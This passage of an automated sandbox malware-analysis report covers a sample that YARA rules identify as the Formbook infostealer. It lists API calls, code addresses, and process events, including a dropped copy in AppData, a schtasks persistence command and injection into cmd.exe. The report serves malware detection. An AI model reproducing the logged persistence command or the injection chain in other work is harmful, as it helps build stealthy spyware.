          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E3B040 NtSuspendThread,13_2_02E3B040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39820 NtEnumerateKey,13_2_02E39820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E399D0 NtCreateProcessEx,13_2_02E399D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39950 NtQueueApcThread,13_2_02E39950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39660 NtAllocateVirtualMemory,13_2_02E39660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39670 NtQueryInformationProcess,13_2_02E39670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39650 NtQueryValueKey,13_2_02E39650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39610 NtEnumerateValueKey,13_2_02E39610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E397A0 NtUnmapViewOfSection,13_2_02E397A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39760 NtOpenProcess,13_2_02E39760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E3A770 NtOpenThread,13_2_02E3A770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39730 NtQueryVirtualMemory,13_2_02E39730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E3A710 NtOpenProcessToken,13_2_02E3A710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E395F0 NtQueryInformationFile,13_2_02E395F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E39520 NtWaitForSingleObject,13_2_02E39520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E3AD30 NtSetContextThread,13_2_02E3AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00519C90 NtCreateFile,13_2_00519C90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00519D40 NtReadFile,13_2_00519D40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00519DC0 NtClose,13_2_00519DC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00519D3A NtReadFile,13_2_00519D3A
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_001622340_2_00162234
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_0016865D0_2_0016865D
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049948DA0_2_049948DA
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_0499C4680_2_0499C468
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049916700_2_04991670
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04991B810_2_04991B81
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049957A00_2_049957A0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04993FF80_2_04993FF8
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049937F00_2_049937F0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_0499DF100_2_0499DF10
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049913610_2_04991361
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04992C000_2_04992C00
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049944280_2_04994428
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_0499D9900_2_0499D990
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049965300_2_04996530
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049975300_2_04997530
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_0499AD580_2_0499AD58
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049975400_2_04997540
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049965400_2_04996540
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049979700_2_04997970
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049979600_2_04997960
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_0499BAB00_2_0499BAB0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049956A10_2_049956A1
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_0499B2C00_2_0499B2C0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04997AE10_2_04997AE1
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049972080_2_04997208
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04996F880_2_04996F88
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049977100_2_04997710
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_049977200_2_04997720
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_0499374F0_2_0499374F
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04996F780_2_04996F78
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_073600700_2_07360070
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041E8903_2_0041E890
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041E1FD3_2_0041E1FD
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041D38A3_2_0041D38A
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041E52A3_2_0041E52A
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00402D8A3_2_00402D8A
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00409E2C3_2_00409E2C
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00409E303_2_00409E30
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041DF993_2_0041DF99
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00F522343_2_00F52234
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_00F5865D3_2_00F5865D
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019899BF3_2_019899BF
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0196F9003_2_0196F900
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019841203_2_01984120
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0197B0903_2_0197B090
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A320A83_2_01A320A8
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019920A03_2_019920A0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A328EC3_2_01A328EC
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A3E8243_2_01A3E824
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A210023_2_01A21002
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0198A8303_2_0198A830
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0198EB9A3_2_0198EB9A
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0199138B3_2_0199138B
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0199EBB03_2_0199EBB0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0199ABD83_2_0199ABD8
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A123E33_2_01A123E3
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A2DBD23_2_01A2DBD2
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A203DA3_2_01A203DA
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A32B283_2_01A32B28
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0198A3093_2_0198A309
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0198AB403_2_0198AB40
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A0CB4F3_2_01A0CB4F
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A322AE3_2_01A322AE
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A24AEF3_2_01A24AEF
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A1FA2B3_2_01A1FA2B
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0198B2363_2_0198B236
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019925813_2_01992581
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A22D823_2_01A22D82
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0197D5E03_2_0197D5E0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A325DD3_2_01A325DD
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A32D073_2_01A32D07
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01960D203_2_01960D20
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A31D553_2_01A31D55
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A244963_2_01A24496
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0197841F3_2_0197841F
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A2D4663_2_01A2D466
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0198B4773_2_0198B477
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A31FF13_2_01A31FF1
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A3DFCE3_2_01A3DFCE
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A11EB63_2_01A11EB6
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A32EF73_2_01A32EF7
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_019856003_2_01985600
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01986E303_2_01986E30
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_01A2D6163_2_01A2D616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EB4AEF13_2_02EB4AEF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC22AE13_2_02EC22AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EAFA2B13_2_02EAFA2B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E1B23613_2_02E1B236
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EA23E313_2_02EA23E3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EB03DA13_2_02EB03DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EBDBD213_2_02EBDBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E2ABD813_2_02E2ABD8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E2EBB013_2_02E2EBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E2138B13_2_02E2138B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E1AB4013_2_02E1AB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E9CB4F13_2_02E9CB4F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC2B2813_2_02EC2B28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E1A30913_2_02E1A309
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC28EC13_2_02EC28EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E220A013_2_02E220A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC20A813_2_02EC20A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E0B09013_2_02E0B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02ECE82413_2_02ECE824
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E1A83013_2_02E1A830
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EB100213_2_02EB1002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E199BF13_2_02E199BF
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E1412013_2_02E14120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02DFF90013_2_02DFF900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC2EF713_2_02EC2EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E16E3013_2_02E16E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EBD61613_2_02EBD616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC1FF113_2_02EC1FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02ECDFCE13_2_02ECDFCE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EB449613_2_02EB4496
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EBD46613_2_02EBD466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E1B47713_2_02E1B477
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E0841F13_2_02E0841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E0D5E013_2_02E0D5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC25DD13_2_02EC25DD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02E2258113_2_02E22581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EB2D8213_2_02EB2D82
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC1D5513_2_02EC1D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02EC2D0713_2_02EC2D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_02DF0D2013_2_02DF0D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_0051E89013_2_0051E890
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_0051E1FD13_2_0051E1FD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_0051E52A13_2_0051E52A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00502D9013_2_00502D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00502D8A13_2_00502D8A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00509E3013_2_00509E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00509E2C13_2_00509E2C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_0051DF9913_2_0051DF99
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 13_2_00502FB013_2_00502FB0
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: String function: 0196B150 appears 145 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02DFB150 appears 136 times
          Source: uVSV3amss8eu5Sr.exeBinary or memory string: OriginalFilename vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000000.355750027.0000000000162000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380250068.0000000007090000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379653630.0000000006470000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.378004309.0000000004A80000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWinRar.dll. vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379292234.0000000006290000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380640171.0000000007190000.00000002.00000001.sdmpBinary or memory string: originalfilename vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.380640171.0000000007190000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000000.00000002.375722005.000000000084A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exeBinary or memory string: OriginalFilename vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.427481922.0000000000F52000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430593281.0000000001BEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430770312.0000000001DAD000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs uVSV3amss8eu5Sr.exe
          Source: uVSV3amss8eu5Sr.exeBinary or memory string: OriginalFilenamedAq.exe, vs uVSV3amss8eu5Sr.exe
          Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: uVSV3amss8eu5Sr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JOOUCiAlE.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@6/3
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04A6063A AdjustTokenPrivileges,0_2_04A6063A
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 0_2_04A60603 AdjustTokenPrivileges,0_2_04A60603
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeFile created: C:\Users\user\AppData\Roaming\JOOUCiAlE.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_01
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB8CB.tmpJump to behavior
          Source: uVSV3amss8eu5Sr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: uVSV3amss8eu5Sr.exeVirustotal: Detection: 23%
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeFile read: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeProcess created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
